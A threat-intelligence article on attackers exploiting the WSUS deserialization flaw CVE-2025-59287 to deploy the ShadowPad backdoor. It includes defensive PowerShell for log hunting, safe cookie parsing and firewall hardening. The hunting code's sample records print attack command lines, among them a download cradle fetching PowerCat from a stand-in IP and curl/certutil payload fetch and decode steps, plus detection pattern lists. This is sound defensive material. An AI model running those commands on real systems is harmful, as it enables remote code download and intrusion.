Threat actors currently abuse CVE-2025-59287, a critical remote code execution flaw in Windows Server Update Services (WSUS), to deliver and run the ShadowPad backdoor with full SYSTEM privileges on Windows servers. Instead of going after exposed RDP or VPN services directly, they move through a trusted update channel that many organizations still treat as “safe by default.”
In the cases analyzed by incident responders, adversaries first gain access to WSUS, then pivot from that high-privileged foothold to install ShadowPad across the environment. Consequently, the compromise does not look like a typical phishing-driven intrusion; it looks like “business as usual” patching until defenders correlate the activity with unusual tooling and outbound connections.
How attackers get from WSUS to a SYSTEM shell
In this campaign, the operators don’t rely on exotic custom loaders at the start. Instead, they abuse the WSUS deserialization flaw to execute arbitrary code on the server, then lean on well-known tools to complete the compromise chain. According to public technical reporting, they specifically target Windows servers with the WSUS role enabled and reachable, then exploit CVE-2025-59287 to obtain code execution in the context of the WSUS service.
After they establish that initial foothold, they fetch a PowerShell-based Netcat equivalent, usually PowerCat, to obtain an interactive SYSTEM shell. The typical pattern involves downloading the PowerCat script from a remote source with a one-line PowerShell download cradle and then launching a reverse shell toward attacker-controlled infrastructure. This step turns WSUS from a simple update distribution endpoint into a live command-and-control pivot.
From there, the operators download ShadowPad components using curl.exe and certutil.exe, both native Windows tools that often slip under the radar because administrators also use them legitimately. The malware arrives as several staged files, which the attackers decode on the server and then execute directly.
What makes CVE-2025-59287 so serious
The vulnerability itself stems from deserialization of untrusted data inside WSUS. In practice, the service processes specially crafted serialized objects from an attacker-controlled request, then reconstructs those objects without sufficient validation. As a result, the attacker can force the server to execute arbitrary code. This class of issue fits squarely into the broader insecure deserialization problem space that OWASP and others have warned about for years.
Because the WSUS service runs as SYSTEM and because organizations frequently centralize update distribution on a small number of critical servers, exploitation immediately raises the stakes. An unauthenticated attacker who can reach the WSUS listener (TCP 8530 for HTTP and 8531 for HTTPS by default) can move in a handful of requests from “outside the network” to “inside with SYSTEM rights,” which compresses the usual kill chain into a single step.
ShadowPad’s role in Chinese-linked operations
ShadowPad itself has a long and documented history in Chinese state-aligned espionage campaigns. Threat intelligence teams describe it as a modular, plugin-based backdoor that supports file operations, credential theft, lateral movement, and long-term command-and-control. Since its emergence in the mid-2010s, multiple APT groups have adopted ShadowPad as a shared capability rather than a one-off implant.
In this WSUS-focused campaign, once ShadowPad lands on the server, it does not simply sit as a static file. Instead, it loads through DLL side-loading. The attackers place a malicious DLL alongside a legitimate executable such as ETDCtrlHelper.exe. When that binary runs, the Windows loader resolves the DLL by name and searches the application’s own directory before the system directories, so the attacker-controlled DLL loads without any exploit; it then injects the ShadowPad payload into memory. This is the Hijack Execution Flow: DLL Side-Loading technique tracked in MITRE ATT&CK.
Because ShadowPad operates largely in memory and because it uses encrypted configuration data, defenders often struggle to identify it through simple file-based signatures. Instead, teams usually need to combine process behavior, network telemetry, and registry analysis to detect the presence of its core modules and plugins.
Attack telemetry: from WSUS endpoint to ShadowPad C2
Telemetry from observed incidents shows a consistent pattern. First, the attacker hits a publicly exposed WSUS instance and runs the deserialization exploit. Next, they use PowerShell to pull down PowerCat, then establish a reverse shell toward their infrastructure. After that, they run curl.exe and certutil.exe to download ShadowPad components from an external IP address before decoding intermediate files into the final payload.
Once the malware initializes, it loads a core module that acts as an orchestrator for additional plugins. Those plugins provide capabilities such as command execution, data exfiltration, and lateral movement. Because the operators control which modules they deploy, the same codebase can support espionage-focused campaigns in one environment and more disruptive or monetization-driven operations in another.
Investigators also observed use of legitimate forensic tools like Velociraptor in some exploitation chains, either for reconnaissance or as part of a hands-on attack where the adversary repurposes blue-team utilities for their own situational awareness. That behavior further complicates detection efforts because the tool appears in many environments as a normal DFIR component.
Why WSUS becomes such a high-value target
From a defender’s point of view, WSUS often sits in a “trusted infrastructure” category. Teams usually prioritize hardening internet-facing web applications, VPN concentrators, and identity providers, while WSUS quietly distributes updates from inside the network. Because of that, logging and monitoring on WSUS servers frequently lags behind other critical assets.
However, the service holds several properties that make it ideal for attackers. It runs with high privileges, it brokers trust between Microsoft and the organization’s endpoints, and it touches a large percentage of domain-joined systems. Therefore, once an APT gains control of WSUS, that actor gains both a distribution channel and a reconnaissance hub. In the ShadowPad scenario, the attackers use WSUS as a reliable pivot into Windows servers that administrators already expect to receive traffic from the update service.
Practical detection ideas for ShadowPad and CVE-2025-59287
Security teams who suspect exposure to CVE-2025-59287 or to ShadowPad should move beyond simple patch checks. They should review logs for PowerShell sessions that download remote scripts: Security event 4688 with command-line auditing enabled (or Sysmon event 1) and PowerShell script block logging (event 4104). The highest-fidelity signal is cmd.exe or powershell.exe spawned by wsusservice.exe or w3wp.exe, since neither WSUS process has a legitimate reason to start a shell; after that, look for command lines that reference PowerCat, raw GitHub URLs, or one-line Invoke-Expression download cradles. In addition, they should inspect process creation logs for abnormal invocations of curl.exe and certutil.exe on WSUS hosts, particularly where those utilities fetch from unrecognized IP addresses or ports, or where certutil is used with -urlcache or -decode.
Beyond that, defenders should baseline which binaries normally run on their WSUS servers, then hunt for unusual DLL loading patterns that may indicate side-loading behavior. Sysmon event 7 (image load) is the natural source: a legitimate executable running from an unexpected location such as ProgramData or a temp directory, loading an unsigned DLL from that same directory, deserves close scrutiny. Threat intelligence and ATT&CK references for DLL side-loading can help analysts map observed events to known techniques.
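The two hunts above, as an added PowerShell example (not code from the original article or from any vendor report): one function over Security 4688 process-creation records and one over Sysmon event 7 image-load records. The sample records, the 198.51.100.7 address (a documentation range) and the DLL file name are constructed for the example so it runs offline; the comment at the end shows where live Get-WinEvent output plugs in.

```powershell
# Added example: hunts one WSUS host for the chain described in the article.
# Sample records below are constructed, not real telemetry.

$WsusParents = @('wsusservice.exe', 'w3wp.exe')            # processes that host WSUS code
$Shells      = @('powershell.exe', 'pwsh.exe', 'cmd.exe')
$Downloaders = @('curl.exe', 'certutil.exe', 'bitsadmin.exe')
# Command-line fragments from the reported chain (PowerCat, download cradles,
# certutil fetch/decode). Regex, matched case-insensitively.
$SuspiciousPatterns = @('powercat', '\biex\b', 'invoke-expression', 'downloadstring',
                        'downloadfile', '-urlcache', '-decode')

function Find-WsusSpawnedShells {
    # Flags 4688 records where a WSUS process spawns a shell, where a downloader
    # pulls a URL, or where a shell/downloader command line matches a pattern.
    param([Parameter(Mandatory)][object[]]$ProcessEvents)
    foreach ($e in $ProcessEvents) {
        $image   = [IO.Path]::GetFileName($e.NewProcessName).ToLowerInvariant()
        $parent  = [IO.Path]::GetFileName($e.ParentProcessName).ToLowerInvariant()
        $cmd     = [string]$e.CommandLine
        $reasons = @()
        if ($WsusParents -contains $parent -and $Shells -contains $image) {
            $reasons += "WSUS process $parent spawned $image"
        }
        if ($Downloaders -contains $image -and $cmd -match '(?i)https?://') {
            $reasons += "$image fetched a URL"
        }
        if (($Shells + $Downloaders) -contains $image) {
            foreach ($p in $SuspiciousPatterns) {
                if ($cmd -match "(?i)$p") { $reasons += "command line matches '$p'" }
            }
        }
        if ($reasons.Count) {
            [pscustomobject]@{ Time = $e.TimeCreated; Parent = $parent; Image = $image
                               CommandLine = $cmd; Reasons = $reasons -join '; ' }
        }
    }
}

function Find-SideLoadCandidates {
    # Flags Sysmon 7 records where a process outside the Windows directory loads
    # an unsigned DLL from its own folder: the ETDCtrlHelper.exe shape above.
    param([Parameter(Mandatory)][object[]]$ImageLoadEvents)
    $windir = if ($env:SystemRoot) { $env:SystemRoot } else { 'C:\Windows' }
    foreach ($e in $ImageLoadEvents) {
        $exeDir = [IO.Path]::GetDirectoryName($e.Image)
        $dllDir = [IO.Path]::GetDirectoryName($e.ImageLoaded)
        $system = $e.Image.StartsWith($windir, [StringComparison]::OrdinalIgnoreCase)
        if (-not $system -and $exeDir -eq $dllDir -and [string]$e.Signed -ne 'true') {
            [pscustomobject]@{ Time = $e.TimeCreated; Process = $e.Image
                               Dll = $e.ImageLoaded; Signed = $e.Signed }
        }
    }
}

# Constructed sample records shaped like the EventData fields of 4688 and Sysmon 7.
$sampleProcessEvents = @(
    [pscustomobject]@{ TimeCreated = '2025-11-01T03:12:07Z'
        ParentProcessName = 'C:\Program Files\Update Services\Service\WsusService.exe'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'
        CommandLine       = 'cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://198.51.100.7/powercat.ps1'')"' }
    [pscustomobject]@{ TimeCreated = '2025-11-01T03:14:51Z'
        ParentProcessName = 'C:\Windows\System32\cmd.exe'
        NewProcessName    = 'C:\Windows\System32\curl.exe'
        CommandLine       = 'curl.exe -o C:\ProgramData\etd.txt http://198.51.100.7/etd.txt' }
    [pscustomobject]@{ TimeCreated = '2025-11-01T03:15:02Z'
        ParentProcessName = 'C:\Windows\System32\cmd.exe'
        NewProcessName    = 'C:\Windows\System32\certutil.exe'
        CommandLine       = 'certutil -decode C:\ProgramData\etd.txt C:\ProgramData\ETD\ETDCtrlHelper.exe' }
    [pscustomobject]@{ TimeCreated = '2025-11-01T08:00:00Z'
        ParentProcessName = 'C:\Windows\explorer.exe'
        NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine       = 'powershell.exe Get-WsusServer' }      # benign admin use, not flagged
)
$sampleImageLoads = @(
    [pscustomobject]@{ TimeCreated = '2025-11-01T03:16:10Z'; Image = 'C:\ProgramData\ETD\ETDCtrlHelper.exe'
        ImageLoaded = 'C:\ProgramData\ETD\ETDHelperShim.dll'; Signed = 'false' }   # placeholder DLL name
    [pscustomobject]@{ TimeCreated = '2025-11-01T03:16:10Z'; Image = 'C:\ProgramData\ETD\ETDCtrlHelper.exe'
        ImageLoaded = 'C:\Windows\System32\kernel32.dll'; Signed = 'true' }
    [pscustomobject]@{ TimeCreated = '2025-11-01T03:20:00Z'; Image = 'C:\Windows\System32\svchost.exe'
        ImageLoaded = 'C:\Windows\System32\wuaueng.dll'; Signed = 'true' }
)

Find-WsusSpawnedShells -ProcessEvents $sampleProcessEvents | Format-Table -AutoSize -Wrap
Find-SideLoadCandidates -ImageLoadEvents $sampleImageLoads | Format-Table -AutoSize

# Live hunt: build the same shaped objects from the event XML, for example
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688; StartTime=(Get-Date).AddDays(-30)} |
#     ForEach-Object { $x = [xml]$_.ToXml(); $d = @{ TimeCreated = $_.TimeCreated }
#       $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }; [pscustomobject]$d }
# and Sysmon event 7 from 'Microsoft-Windows-Sysmon/Operational' the same way.
```

Against the sample data the first three process records are flagged (WSUS-spawned shell plus the PowerCat cradle, a curl.exe fetch, a certutil decode) and the explorer-launched admin session is not; only the unsigned DLL loaded from the ETDCtrlHelper.exe directory is reported as a side-load candidate. The side-load check is deliberately loose, since Sysmon's Signed field describes the loaded DLL, not the process; confirm the executable itself is signed with Get-AuthenticodeSignature before treating a hit as a true positive.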
Finally, organizations should examine their use of deserialization across internal services more broadly. Whenever a critical component ingests serialized objects from network clients, it should treat that data as hostile. Validating the object after deserialization is too late, because a polymorphic serializer such as .NET’s BinaryFormatter instantiates whatever types the input names before the caller ever sees the result; the safe pattern is to authenticate the blob before parsing it, parse it into a fixed schema, and retire serializers that let the sender choose the type. The WSUS case underlines how quickly a deserialization issue can evolve from a theoretical code-execution bug into a fully weaponized intrusion vector that deploys advanced implants.
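To make that last point concrete, an added example (not WSUS code and not a description of the vendor’s fix) that puts the vulnerable shape next to a hardened one. It assumes the blob the client returns is a cookie the server itself issued earlier; $ServerKey, the field names and the client identifier are placeholders. It runs on Windows PowerShell 5.1; the unsafe function is shown for contrast and is never called.

```powershell
# Added example: client-supplied "cookie" handling, unsafe shape vs hardened shape.

$ServerKey = [Text.Encoding]::UTF8.GetBytes('placeholder-secret-replace-and-rotate')

# ---- Vulnerable shape: the wire format names the types ------------------------
function Read-CookieUnsafe {
    param([byte[]]$Blob)                      # bytes straight from the request
    # BinaryFormatter rebuilds whatever object graph the blob describes. The
    # constructors, setters and deserialization callbacks of those types have
    # already run by the time Deserialize returns, so a type check afterwards
    # (and any decryption before it) does not help: the parse itself is the sink.
    $bf  = New-Object System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
    $obj = $bf.Deserialize((New-Object IO.MemoryStream(,$Blob)))
    if ($obj -isnot [hashtable]) { throw 'bad cookie' }   # too late
    return $obj
}

# ---- Hardened shape: fixed fields, authenticated before parsing ---------------
function Test-FixedTimeEqual {
    param([byte[]]$A, [byte[]]$B)
    if ($A.Length -ne $B.Length) { return $false }
    $diff = 0
    for ($i = 0; $i -lt $A.Length; $i++) { $diff = $diff -bor ($A[$i] -bxor $B[$i]) }
    return ($diff -eq 0)
}

function New-AuthCookie {
    # Server-side issue: two known fields in a non-polymorphic format (JSON)
    # plus an HMAC so the server can tell its own cookies from forgeries.
    param([string]$ClientId, [datetime]$Expires)
    $json    = @{ cid = $ClientId; exp = $Expires.ToUniversalTime().ToString('o') } | ConvertTo-Json -Compress
    $payload = [Text.Encoding]::UTF8.GetBytes($json)
    $mac     = [Security.Cryptography.HMACSHA256]::new($ServerKey).ComputeHash($payload)
    return [Convert]::ToBase64String($payload) + '.' + [Convert]::ToBase64String($mac)
}

function Read-AuthCookie {
    # Server-side read: verify the MAC first, then parse into explicit, validated
    # fields. ConvertFrom-Json yields plain property bags; no type name from the
    # wire is ever honoured, so there is no gadget chain to reach.
    param([string]$Cookie)
    $parts = $Cookie -split '\.'
    if ($parts.Count -ne 2) { return $null }
    try { $payload = [Convert]::FromBase64String($parts[0]); $mac = [Convert]::FromBase64String($parts[1]) }
    catch { return $null }
    $expected = [Security.Cryptography.HMACSHA256]::new($ServerKey).ComputeHash($payload)
    if (-not (Test-FixedTimeEqual $expected $mac)) { return $null }      # forged or corrupted
    $doc = [Text.Encoding]::UTF8.GetString($payload) | ConvertFrom-Json
    $cid = [string]$doc.cid
    if ($cid -notmatch '^[A-Za-z0-9-]{1,64}$') { return $null }
    $exp = [datetime]::Parse([string]$doc.exp, [Globalization.CultureInfo]::InvariantCulture,
                             [Globalization.DateTimeStyles]::AdjustToUniversal)
    if ($exp -lt [datetime]::UtcNow) { return $null }                     # expired
    return [pscustomobject]@{ ClientId = $cid; Expires = $exp }
}

# Demo: a genuine cookie parses; a forged payload that reuses the genuine MAC is
# rejected before any parsing happens.
$cookie = New-AuthCookie -ClientId 'client-0042' -Expires ([datetime]::UtcNow.AddHours(1))
Read-AuthCookie -Cookie $cookie
$forgedPayload = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('{"cid":"admin","exp":"2099-01-01T00:00:00.0000000Z"}'))
if ($null -eq (Read-AuthCookie -Cookie ($forgedPayload + '.' + $cookie.Split('.')[1]))) { 'forgery rejected' }
```

The design choice worth noting is the order of operations: the MAC check runs over raw bytes, the parser only ever sees bytes the server itself produced, and every field is pulled out by name and range-checked. Encrypting a blob does not substitute for this; if the decrypted bytes still flow into a serializer that honours embedded type names, the attacker only needs to satisfy whatever wrapping the server applies.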
Strategic mitigation: patching, segmentation, and visibility
Even though Microsoft has already issued patches for CVE-2025-59287, many organizations still run vulnerable WSUS instances. Therefore, patch verification must sit at the top of the response plan. Teams should confirm that both the original October 2025 security update and the out-of-band update Microsoft released on October 23, 2025, after the first fix proved incomplete, have reached all WSUS servers, that each server has been restarted since the update installed, and that lab or test environments that quietly sync from production are included.
At the same time, security architects should reevaluate WSUS network exposure. WSUS listens on TCP 8530 (HTTP) and 8531 (HTTPS) by default, and Microsoft’s interim guidance for servers that could not be patched was to block inbound traffic to those ports at the host firewall or to disable the WSUS Server Role entirely. Wherever possible, restrict those ports to the internal subnets whose clients and downstream servers actually need them, and never expose WSUS directly to the public internet. Where business constraints force broader exposure, put an authenticating reverse proxy or inspection layer in front of the service so that anonymous requests cannot reach the deserialization surface.
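An added PowerShell audit and mitigation helper for the exposure just described (not from the original article or from Microsoft). It assumes the default WSUS ports 8530 and 8531; $RequiredKbs is a placeholder to fill from the MSRC advisory for CVE-2025-59287, and the subnets in the usage line are placeholders for the networks whose clients must reach the server. Run it elevated on the WSUS host.

```powershell
# Added example: audit a WSUS host's exposure, then restrict inbound access.

$WsusPorts   = 8530, 8531
$RequiredKbs = @()     # placeholder: the update ID for this OS, from the MSRC advisory

function Get-WsusExposure {
    # Role present? Ports listening? Which enabled inbound allow rules open them to Any?
    $role = Get-WindowsFeature -Name UpdateServices -ErrorAction SilentlyContinue
    $listening = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { $WsusPorts -contains $_.LocalPort } |
        Select-Object -ExpandProperty LocalPort -Unique
    $openToAny = foreach ($rule in Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True) {
        $ports  = ($rule | Get-NetFirewallPortFilter).LocalPort      # 'Any', '8530', or a list; ranges not parsed
        $remote = ($rule | Get-NetFirewallAddressFilter).RemoteAddress
        $hit = ($ports -eq 'Any') -or ($ports | Where-Object { $WsusPorts -contains $_ })
        if ($hit -and ($remote -eq 'Any')) { $rule.DisplayName }
    }
    # Get-HotFix is a quick check; the OS build number (UBR) is the authoritative one.
    $ubr   = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').UBR
    $build = "$([Environment]::OSVersion.Version.Build).$ubr"
    $kbs   = if ($RequiredKbs.Count) { Get-HotFix -Id $RequiredKbs -ErrorAction SilentlyContinue }
    [pscustomobject]@{
        RoleInstalled   = [bool]($role -and $role.Installed)
        ListeningPorts  = @($listening)
        AllowRulesToAny = @($openToAny)
        OSBuild         = $build
        RequiredKbsSeen = @($kbs | Select-Object -ExpandProperty HotFixID)
    }
}

function Limit-WsusInbound {
    # With no -AllowedFrom this applies the interim mitigation: block the ports
    # outright (clients lose updates until the server is patched). With subnets
    # it disables the broad allow rules for these ports and adds one scoped allow
    # rule. Windows Firewall lets Block win over Allow, so a plain block rule is
    # enough in the first case; in the second the broad allows must go, not be
    # overridden. Rules that open every port are reported above but not touched.
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$AllowedFrom = @())
    foreach ($rule in Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True) {
        $ports = ($rule | Get-NetFirewallPortFilter).LocalPort
        if (($ports | Where-Object { $WsusPorts -contains $_ }) -and
            $PSCmdlet.ShouldProcess($rule.DisplayName, 'Disable broad WSUS allow rule')) {
            Disable-NetFirewallRule -Name $rule.Name
        }
    }
    if ($AllowedFrom.Count -eq 0) {
        New-NetFirewallRule -DisplayName 'WSUS 8530/8531: block inbound (CVE-2025-59287 interim)' `
            -Direction Inbound -Action Block -Protocol TCP -LocalPort $WsusPorts -Profile Any | Out-Null
    } else {
        New-NetFirewallRule -DisplayName 'WSUS 8530/8531: allow from client and admin subnets only' `
            -Direction Inbound -Action Allow -Protocol TCP -LocalPort $WsusPorts `
            -RemoteAddress $AllowedFrom -Profile Any | Out-Null
        Set-NetFirewallProfile -All -DefaultInboundAction Block
    }
}

Get-WsusExposure | Format-List
# Preview first, then drop -WhatIf. The subnets are placeholders.
Limit-WsusInbound -AllowedFrom '10.10.0.0/16', '10.20.5.0/24' -WhatIf
```

Two cautions when using this for real: the allow list must include every subnet that syncs from or downloads through this server (downstream WSUS servers included), or patching stops for those hosts; and the host firewall is a compensating control at the edge of the box, so the same restriction belongs on the network ACLs in front of it.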
To round out the mitigation strategy, defenders should strengthen endpoint visibility. Tools like Velociraptor and other DFIR platforms can provide rapid collection of process, registry, and network data across large fleets, which enables targeted hunts for ShadowPad indicators or deserialization exploit traces. However, teams must configure those tools carefully so that adversaries cannot repurpose them if they compromise their control plane.
FAQs
Q: Does ShadowPad only target WSUS?
ShadowPad does not limit itself to WSUS. The backdoor appears in campaigns that abuse a variety of initial access vectors, including supply-chain compromises and other server-side vulnerabilities.
Q: If I have patched WSUS, can I assume I’m safe?
Patch deployment significantly reduces risk, yet it does not prove that attackers never exploited the bug before the update landed. Teams should still run targeted threat-hunting queries on WSUS servers and surrounding infrastructure, looking for PowerCat activity, odd curl.exe and certutil.exe usage, and unexpected DLLs sitting beside legitimate executables.
Q: What if my organization can’t patch WSUS immediately?
In cases where patching lags behind, organizations should harden network access, introduce strict ACLs around WSUS, and implement high-fidelity monitoring on the vulnerable endpoints. Compensating controls never fully replace fixes.